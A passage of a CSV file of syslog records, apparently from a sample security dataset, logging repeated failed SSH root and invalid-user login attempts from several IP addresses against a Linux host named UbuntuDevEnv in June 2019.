+14577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:17,UbuntuDevEnv,2019-06-26 05:03:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 58584: Too many authentication failures [preauth],4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,58584,,
+14578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:17,UbuntuDevEnv,2019-06-26 05:03:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 58584 ssh2 [preauth],4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,58584,,
+14579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:17,UbuntuDevEnv,2019-06-26 05:03:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:17,UbuntuDevEnv,2019-06-26 05:03:17,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 58584 ssh2],4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,58584,,
+14581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:20,UbuntuDevEnv,2019-06-26 05:03:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:23,UbuntuDevEnv,2019-06-26 05:03:22,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 63977 ssh2,4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63977,,
+14583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:36,UbuntuDevEnv,2019-06-26 05:03:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 63977 ssh2 [preauth],4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63977,,
+14584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:36,UbuntuDevEnv,2019-06-26 05:03:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:36,UbuntuDevEnv,2019-06-26 05:03:35,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:36,UbuntuDevEnv,2019-06-26 05:03:35,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 63977 ssh2],4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63977,,
+14587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:36,UbuntuDevEnv,2019-06-26 05:03:35,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 63977: Too many authentication failures [preauth],4801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,63977,,
+14588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:39,UbuntuDevEnv,2019-06-26 05:03:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:39,UbuntuDevEnv,2019-06-26 05:03:39,auth,UbuntuDevEnv,info,Invalid user ftp1 from 196.41.208.238 port 42359,4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,196.41.208.2,42359,,
+14590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:39,UbuntuDevEnv,2019-06-26 05:03:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:39,UbuntuDevEnv,2019-06-26 05:03:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:41,UbuntuDevEnv,2019-06-26 05:03:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:41,UbuntuDevEnv,2019-06-26 05:03:41,auth,UbuntuDevEnv,info,Failed password for invalid user ftp1 from 196.41.208.238 port 42359 ssh2,4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,196.41.208.2,42359,,
+14594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:41,UbuntuDevEnv,2019-06-26 05:03:41,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 42359:11: Bye Bye [preauth],4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,42359,,
+14595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:41,UbuntuDevEnv,2019-06-26 05:03:41,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp1 196.41.208.238 port 42359 [preauth],4872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,196.41.208.2,42359,,
+14596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:43,UbuntuDevEnv,2019-06-26 05:03:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:46,UbuntuDevEnv,2019-06-26 05:03:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:47,UbuntuDevEnv,2019-06-26 05:03:47,auth,UbuntuDevEnv,info,Invalid user magento from 200.6.188.38 port 21663,4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,200.6.188.3,21663,,
+14599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:47,UbuntuDevEnv,2019-06-26 05:03:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:47,UbuntuDevEnv,2019-06-26 05:03:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:48,UbuntuDevEnv,2019-06-26 05:03:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:49,UbuntuDevEnv,2019-06-26 05:03:49,auth,UbuntuDevEnv,info,Failed password for invalid user magento from 200.6.188.38 port 21663 ssh2,4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,200.6.188.3,21663,,
+14603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:50,UbuntuDevEnv,2019-06-26 05:03:49,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 21663:11: Bye Bye [preauth],4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,21663,,
+14604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:50,UbuntuDevEnv,2019-06-26 05:03:49,auth,UbuntuDevEnv,info,Disconnected from invalid user magento 200.6.188.38 port 21663 [preauth],4900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,200.6.188.3,21663,,
+14605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:51,UbuntuDevEnv,2019-06-26 05:03:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:53,UbuntuDevEnv,2019-06-26 05:03:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:53,UbuntuDevEnv,2019-06-26 05:03:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:53,UbuntuDevEnv,2019-06-26 05:03:53,auth,UbuntuDevEnv,info,Invalid user bukkit from 177.23.90.10 port 59656,4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,177.23.90.1,59656,,
+14609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:54,UbuntuDevEnv,2019-06-26 05:03:53,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5441 ssh2,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:54,UbuntuDevEnv,2019-06-26 05:03:53,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 5441 ssh2 [preauth],4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5441,,
+14611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:54,UbuntuDevEnv,2019-06-26 05:03:53,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:54,UbuntuDevEnv,2019-06-26 05:03:53,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:54,UbuntuDevEnv,2019-06-26 05:03:53,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 5441: Too many authentication failures [preauth],4868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,5441,,
+14614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:55,UbuntuDevEnv,2019-06-26 05:03:54,auth,UbuntuDevEnv,info,Failed password for invalid user bukkit from 177.23.90.10 port 59656 ssh2,4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,177.23.90.1,59656,,
+14615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:55,UbuntuDevEnv,2019-06-26 05:03:54,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 59656:11: Bye Bye [preauth],4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,59656,,
+14616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:55,UbuntuDevEnv,2019-06-26 05:03:54,auth,UbuntuDevEnv,info,Disconnected from invalid user bukkit 177.23.90.10 port 59656 [preauth],4927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,177.23.90.1,59656,,
+14617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:56,UbuntuDevEnv,2019-06-26 05:03:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:58,UbuntuDevEnv,2019-06-26 05:03:58,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11379 ssh2,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11379,,
+14619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:01,UbuntuDevEnv,2019-06-26 05:04:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11379 ssh2,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11379,,
+14620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:03,UbuntuDevEnv,2019-06-26 05:04:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11379 ssh2,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11379,,
+14621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:12,UbuntuDevEnv,2019-06-26 05:04:11,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 11379 ssh2],4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11379,,
+14622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:12,UbuntuDevEnv,2019-06-26 05:04:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:12,UbuntuDevEnv,2019-06-26 05:04:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 11379 ssh2 [preauth],4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11379,,
+14624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:12,UbuntuDevEnv,2019-06-26 05:04:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 11379: Too many authentication failures [preauth],4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,11379,,
+14625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:12,UbuntuDevEnv,2019-06-26 05:04:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:14,UbuntuDevEnv,2019-06-26 05:04:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:17,UbuntuDevEnv,2019-06-26 05:04:16,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19038 ssh2,5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19038,,
+14628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:29,UbuntuDevEnv,2019-06-26 05:04:29,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 19038 ssh2],5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19038,,
+14629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:29,UbuntuDevEnv,2019-06-26 05:04:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 19038: Too many authentication failures [preauth],5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,19038,,
+14630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:29,UbuntuDevEnv,2019-06-26 05:04:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:29,UbuntuDevEnv,2019-06-26 05:04:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 19038 ssh2 [preauth],5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19038,,
+14632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:29,UbuntuDevEnv,2019-06-26 05:04:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5010,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:32,UbuntuDevEnv,2019-06-26 05:04:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:34,UbuntuDevEnv,2019-06-26 05:04:33,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25678 ssh2,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:34,UbuntuDevEnv,2019-06-26 05:04:34,auth,UbuntuDevEnv,info,Invalid user forge from 5.135.161.72 port 57082,5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forge,5.135.161.7,57082,,
